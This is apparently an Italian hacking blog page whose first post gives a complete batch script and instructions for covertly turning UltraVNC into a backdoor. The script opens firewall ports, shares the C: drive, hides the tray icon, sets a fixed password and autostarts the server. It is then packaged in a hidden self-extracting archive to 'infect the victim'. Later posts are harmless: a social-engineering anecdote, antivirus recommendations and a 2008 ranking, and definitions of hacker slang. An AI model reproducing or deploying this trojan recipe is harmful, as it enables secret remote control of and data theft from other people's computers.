Che cos’è ULTRAVNC?

UltraVNC è un’applicazione in grado di stabilire una connessione tra due o più PC permettendo non soltanto di vedere una riproduzione esatta del desktop, ma anche di controllare completamente il PC su cui è stato installato VNC server. Tutto ciò è possibile grazie all’utilizzo del protocollo VNC (Virtual Network Computing), una tecnologia sviluppata per il cosiddetto desktop sharing: questa funzione prevede la presenza di una parte destinata a fare lo streaming dei dati (server) e di una per la riproduzione del flusso di dati (client); ovviamente la parte server dovrà essere installata sul PC che si desidera monitorare, mentre quella client andrà posizionata sul sistema di controllo.

GUIDA A SCOPO PURAMENTE INFORMATIVO. NON MI ASSUMO NESSUNA RESPONSABILITA’ DI CIO’ CHE NE FARETE: (Autori della guida “CrAsHer_90″ e “N3T”)

Accesso in remoto tramite il noto programma VNC. Prima di tutto scaricate ULTRAVNC Download

dopo averlo installato aprite il blocco note ed inserite il codice che segue:
===============================================================================
@echo off
netsh firewall add portopening TCP 5900 PORTAWEB
netsh firewall add portopening TCP 139 PORTAWEB
net share disco=C:\
netsh firewall add allowedprogram program= C:\winvnc.exe name= mqdsmode=enablescope=all profile=all
@echo off
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v BlackAlphaBlending /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v BlankMonitorEnable /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v CaptureAlphaBlending /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v DefaultScale /t REG_DWORD /d 1 /f
REG ADD HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v FileTransferEnable /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v FTUserImpersonation /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v HTTPConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Idle Timeout /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v LocalInputDisabled /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v LockSetting /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d F3268FE776CDFF8A /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v QueryAccept /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v QuerySetting /t REG_DWORD /d 2 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v UseDSMPlugin /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v XDMCPConnect /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d “C:\winvnc.exe”
@start c:\winvnc.exe
exit
===================================================================================
Adesso salvatelo con estensione .bat (come potete notare nel codice batch ho messo pure il comando per aprire la porta 139 e per condividere il disco C:\) potete compilare il codice batch in modalità “Ghost” con Quick Batch File Compiler . Fatto ciò andate su Risorse del computer<C:\<Programmi<ultravnc e prelevate “winvnc.exe” (server del vnc) mettetelo nel desktop assieme al file.bat (o file.exe se l’avete compilato in modalità ghost). Ora metteteli in un archivio AUTOESTRAENTE che dovrà estrarre i file in C:\ e che dovrà lanciare in automatico il file.bat e di conseguenza lancerà il server. (@start C:\winvnc.exe)
una volta infettata la vittima con l’exe creato… aprite il client (vncviewer) inserite l’ip e godetevi il desktop remoto

Guida: By “CrAsHeR_90″ e “N3T”

Girando per i web si può notare che questa tecnica viene sfruttata molto, specialmente nei forum ad esempio:

Utente: Ciao

Founder: Ciao

Utente: Bello il forum, però manca qualcosa ad esempio una bella skin personalizzata..

Founder: E si pultroppo non me ne intendo molto di grafica..

Utente: io sono molto bravo

Founder: Ah si, allora la puoi creare tu?

Utente: Per me va bene, però mettimi almeno admin.

Founder: ok allora ti metto admin.

Ecco qua un esempio sciocco ma davvero micidiale che nella maggior parte dei casi vieni usato dai lamer, per impadronirsi del pieno controllo amministrativo e quindi fare ciò che si vuole al forum, dovete tenere per questo gli occhi aperti, prima di assumere una persona allo staff la dovete conoscere, non potete mettere il primo che capita..

Nell’esempio potete capire che in questa tecnica non c’è alcun metodo per fermarla ma và oltre il pc, colpisce la mente, sarà la mente stessa a poterla fermare..

Avast! Home Edition è ora gratuito per utenti HOME (domestici) e per uso NON-COMMERCIALE. Per ulteriori informazioni cliccare qui. Se non siete utenti domestici, o utilizzate il computer per lavoro, non è possibile utilizzare avast! Home Edition, e occorre acquistare la versione commerciale - avast! Professional Edition.

Per utilizzare la Home Edition, dovete registrarvi qui. Dopo la prima installazione avete 60 giorni di tempo per provare il programma (come per tutti i prodotti avast!) prima di completare la registrazione. Il processo di registrazione è molto semplice e veloce: sono necessari solo un paio di minuti….

Tutti i pacchetti di setup sono eseguibili automaticamente e digitalmente firmati da ALWIL Software.

Sito ufficiale.

Questo articolo vi mosterà i migliori antivirus del 2008, le fasce di risultato sono tre: Advance+ (indica un’ eccellente percentuale di indivuazione virus) Advanced (indica un ottima percentuale) standard (un buon risultato). Vediamo la classifica:

Livello ADVANCED+

• Kaspersky
• Nod32

Livello ADVANCED

• Avg
• Avk
• Avast!
• Mc Afee
• MIcrosoft
• Norman
• Symantec

Livello STANDARD

• Avira
• BitDefender
• Dr Web
• e scan
• F- prot
• F- secure
• TrustPort

Fonte: TechnoBlog

L’antivirus è un comune software che aiuta il pc, può rilevare virus, worm, trojan e altro..

Il problema è che bisogna avere sempre una versione aggiornata per rilevare tutte queste minacce anche perchè non è detto che l’antivirus le rilevi tutte!

Il funzionamento è basato sulla RAM dove il software cerca di rilevare i frammenti di codice dannosi (virus) per eliminarli.

Se volete approfondire questo argomento vi potete racare a questo link.

Hacker
In questi ultimi tempi girovagando per il web e per i forum si può notare che tante persone hanno nella firma la targhetta “hacker” e alcune di esse non hanno le minime conoscenze di tutto questo, perchè:
Orami per alcune persone è diventato un privilegio solo essere chiamati “hacker” no per le cose che sanno fare, lasciando questo penso che nessuno si dovrebbe definirsi hacker da solo, perchè l’hacking non comprende solo queste conoscenze, l’hacker vero non sò neanche io cosa sia perchè non ci sarà mai una spiegazione precisa di tutto ciò. Se volete approfondire questo argomento vi potete recare a questo link.

Cracker
Il termine cracker spesse volte può essere affiancato o scambiato con il termine “hacker” invece tutto questo è sbagliato perchè sono due mondi diversi, il cracker mira a sfruttare i cosiddetti “bug” nei siti, per dedurre dei guadagni ad esempio possono essere dei guadagni anche economici. Se volete approfondire questo argomento vi potete recare a questo link.

Lamer
Il lamer è colui che è privo di conoscenze soprattutto nel mondo della programmazione e si limita ad usare programmi altrui per recare danni ad una persona, di solito reca danni per il gusto di saperlo fare e di divertirsi, ad esempio visto che le sue conoscenze sono poche si può anche limitare a rubare account sempre per il solo gusto e alcuni di essi facendo queste cose si sentono hacker cosa che gli hacker detestano..
Spero che ogni persona sia consapevole di cosa sia il termine lamer. Se volete approfondire questo argomento vi potete recare a questo link.

Wannabe
Questo termine è abbastanza semplice, oramai non è molto usato ma significa una persona che si spaccia per hacker quando non ha conoscenze di tutto ciò..

Questa spiegazione dei vocaboli è stata scritta da me, per maggiori informazioni nel web potete trovare altro..

Il nod32 secondo me è uno dei migliori antivirus a cui vi potete affidare, ha ricevuto per il secondo anno consecutivo il premio come miglior antivirus dell’anno, inoltre le dimensioni del nod32 sono abbastanza convenienti, ed ha tante funzionalità, potete trovare una versiona di prova (30 giorni) direttamente nel sito ufficiale per poterlo testare.

Ecco qua uno screen:

Benvenuti visitatori, questo è il blog di HackerDomination, dove potete trovare tanti articoli sulla sicurezza informatica ma non solo, potete trovare anche argomenti sull’hacking, su messenger e molto altro ancora..

Vi ricordo se volete ci potete trovare anche nel nostro forum .

Buona permenza da tutto lo staff..